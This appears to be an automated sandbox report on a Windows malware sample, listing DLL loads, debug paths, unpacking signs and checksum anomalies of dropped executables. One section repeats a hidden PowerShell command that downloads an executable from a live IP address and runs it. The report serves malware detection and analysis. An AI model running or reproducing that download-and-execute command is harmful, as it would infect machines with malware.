                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: wbemcomn.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: amsi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeSection loaded: edgegdi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: edgegdi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: shfolder.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: riched20.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: usp10.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: msls31.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: textinputframework.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: coreuicomponents.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: coremessaging.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: ntmarta.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: textshaping.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: edputil.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: urlmon.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: iertutil.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: srvcli.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: netutils.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: appresolver.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: bcp47langs.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: slc.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: sppc.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dll
                                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dll
                                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: edgegdi.dll
                                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dll
                                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dll
                                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dll
                                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dll
                                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dll
                                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dll
                                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dll
                                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dll
                                Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: edgegdi.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: napinsp.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: pnrpnsp.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: wshbth.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: nlaapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: mswsock.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: dnsapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: winrnr.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: rasadhlp.dll
                                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\choice.exeSection loaded: edgegdi.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: edgegdi.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: napinsp.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: pnrpnsp.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: wshbth.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: nlaapi.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: mswsock.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: dnsapi.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: winrnr.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: rasadhlp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exeSection loaded: powrprof.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exeSection loaded: umpdc.dll
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeSection loaded: mscoree.dll
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeSection loaded: apphelp.dll
                                Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                                Source: QkRFz2sau5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                Source: QkRFz2sau5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                Source: QkRFz2sau5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                Source: QkRFz2sau5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: QkRFz2sau5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                Source: QkRFz2sau5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                Source: QkRFz2sau5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: 935372fb1f.exe, 00000010.00000002.22377836357.0000000000410000.00000040.00000001.01000000.00000013.sdmp, 935372fb1f.exe, 00000010.00000003.22357417975.0000000004A0F000.00000004.00001000.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22773040664.0000000000410000.00000040.00000001.01000000.0000001E.sdmp, c7f37422c5.exe, 00000032.00000003.22752671703.00000000049FF000.00000004.00001000.00020000.00000000.sdmp
                                Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: 935372fb1f.exe, 00000010.00000002.22379704767.0000000000C78000.00000004.00000020.00020000.00000000.sdmp, 935372fb1f.exe, 00000010.00000002.22391402178.0000000007426000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22789634880.00000000073FB000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22775648056.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Bedroom.pdbH^ source: f891ed3167.exe, 00000024.00000000.22557531054.0000000000912000.00000002.00000001.01000000.00000019.sdmp, f891ed3167.exe, 00000024.00000002.22603526519.0000000003D99000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: 935372fb1f.exe, 00000010.00000002.22391402178.0000000007426000.00000004.00000020.00020000.00000000.sdmp, 935372fb1f.exe, 00000010.00000002.22383262104.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22789634880.00000000073FB000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22782201415.00000000052C9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: BitLockerToGo.pdb source: 33c3d7c7bd.exe, 00000023.00000002.22885525568.000000000A280000.00000004.00001000.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\Badus\OneDrive\Desktop\Bot1.0.8\Bot\LiteHTTP\obj\x86\Debug\SystemHelper.pdb source: skotes.exe, 0000000E.00000002.23301841769.000000000107B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: 935372fb1f.exe, 00000010.00000002.22379704767.0000000000C78000.00000004.00000020.00020000.00000000.sdmp, 935372fb1f.exe, 00000010.00000002.22391402178.0000000007426000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22789634880.00000000073FB000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22775648056.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: 935372fb1f.exe, 00000010.00000002.22391402178.0000000007426000.00000004.00000020.00020000.00000000.sdmp, 935372fb1f.exe, 00000010.00000002.22383262104.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22789634880.00000000073FB000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22782201415.00000000052C9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: BitLockerToGo.pdbGCTL source: 33c3d7c7bd.exe, 00000023.00000002.22885525568.000000000A280000.00000004.00001000.00020000.00000000.sdmp
                                Source: Binary string: em.pdb source: powershell.exe, 00000009.00000002.22110805513.000001D3449AF000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Bedroom.pdb source: f891ed3167.exe, 00000024.00000000.22557531054.0000000000912000.00000002.00000001.01000000.00000019.sdmp, f891ed3167.exe, 00000024.00000002.22603526519.0000000003D99000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: .pdbTw source: powershell.exe, 00000009.00000002.22110805513.000001D3449AF000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Battery.pdb source: f8e8a2d2f0.exe, 0000002A.00000002.22650688983.0000000004289000.00000004.00000800.00020000.00000000.sdmp, f8e8a2d2f0.exe, 0000002A.00000000.22619514498.0000000000DD2000.00000002.00000001.01000000.0000001C.sdmp
                                Source: QkRFz2sau5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: QkRFz2sau5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: QkRFz2sau5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: QkRFz2sau5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: QkRFz2sau5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                Data Obfuscation

                                barindex
                                Detected unpacking (changes PE section rights)
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEUnpacked PE file: 11.2.Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE.420000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rtrxnzik:EW;vyhzfbjm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rtrxnzik:EW;vyhzfbjm:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 12.2.skotes.exe.6d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rtrxnzik:EW;vyhzfbjm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rtrxnzik:EW;vyhzfbjm:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 13.2.skotes.exe.6d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rtrxnzik:EW;vyhzfbjm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rtrxnzik:EW;vyhzfbjm:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 14.2.skotes.exe.6d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rtrxnzik:EW;vyhzfbjm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rtrxnzik:EW;vyhzfbjm:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeUnpacked PE file: 15.2.9c1024a1f1.exe.fc0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ndccpyxw:EW;hexaatse:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ndccpyxw:EW;hexaatse:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeUnpacked PE file: 16.2.935372fb1f.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gdiknbhi:EW;bcaisgyr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gdiknbhi:EW;bcaisgyr:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeUnpacked PE file: 50.2.c7f37422c5.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ndmxoxsq:EW;subumggu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ndmxoxsq:EW;subumggu:EW;.taggant:EW;
                                .NET source code contains method to dynamically call methods (often used by packers)
                                Source: random[2].exe.14.dr, s1l70P8mWLYDmBOs6L.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                                Source: f891ed3167.exe.14.dr, s1l70P8mWLYDmBOs6L.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                                Source: random[2].exe0.14.dr, PjMboxrZKVMRiayL4T.cs.Net Code: i2YYN1EXNBPCmRatdf4(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{i2YYN1EXNBPCmRatdf4(typeof(IntPtr).TypeHandle),typeof(Type)})
                                Source: f8e8a2d2f0.exe.14.dr, PjMboxrZKVMRiayL4T.cs.Net Code: i2YYN1EXNBPCmRatdf4(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{i2YYN1EXNBPCmRatdf4(typeof(IntPtr).TypeHandle),typeof(Type)})
                                Suspicious powershell command line found
                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;Jump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;Jump to behavior
                                Source: random[2].exe.14.drStatic PE information: 0xDF9E7476 [Fri Nov 19 11:54:30 2088 UTC]
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009642DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009642DE
                                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                                Source: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE.6.drStatic PE information: real checksum: 0x218f49 should be: 0x215024
                                Source: f8e8a2d2f0.exe.14.drStatic PE information: real checksum: 0x0 should be: 0xbb8c2
                                Source: random[1].exe0.14.drStatic PE information: real checksum: 0x209862 should be: 0x203baa
                                Source: 935372fb1f.exe.14.drStatic PE information: real checksum: 0x219d2f should be: 0x20e8e8
                                Source: skotes.exe.11.drStatic PE information: real checksum: 0x218f49 should be: 0x215024
                                Source: f891ed3167.exe.14.drStatic PE information: real checksum: 0x0 should be: 0xd2e10
                                Source: random[2].exe0.14.drStatic PE information: real checksum: 0x0 should be: 0xbb8c2
                                Source: random[2].exe1.14.drStatic PE information: real checksum: 0x0 should be: 0x557df
                                Source: random[1].exe2.14.drStatic PE information: real checksum: 0xdfde2 should be: 0xd54e7
                                Source: random[1].exe1.14.drStatic PE information: real checksum: 0x219d2f should be: 0x20e8e8
                                Source: 7ecb69d7f1.exe.14.drStatic PE information: real checksum: 0xdfde2 should be: 0xd54e7
                                Source: d9caf9fc21.exe.14.drStatic PE information: real checksum: 0x0 should be: 0x557df
                                Source: random[2].exe.14.drStatic PE information: real checksum: 0x0 should be: 0xd2e10
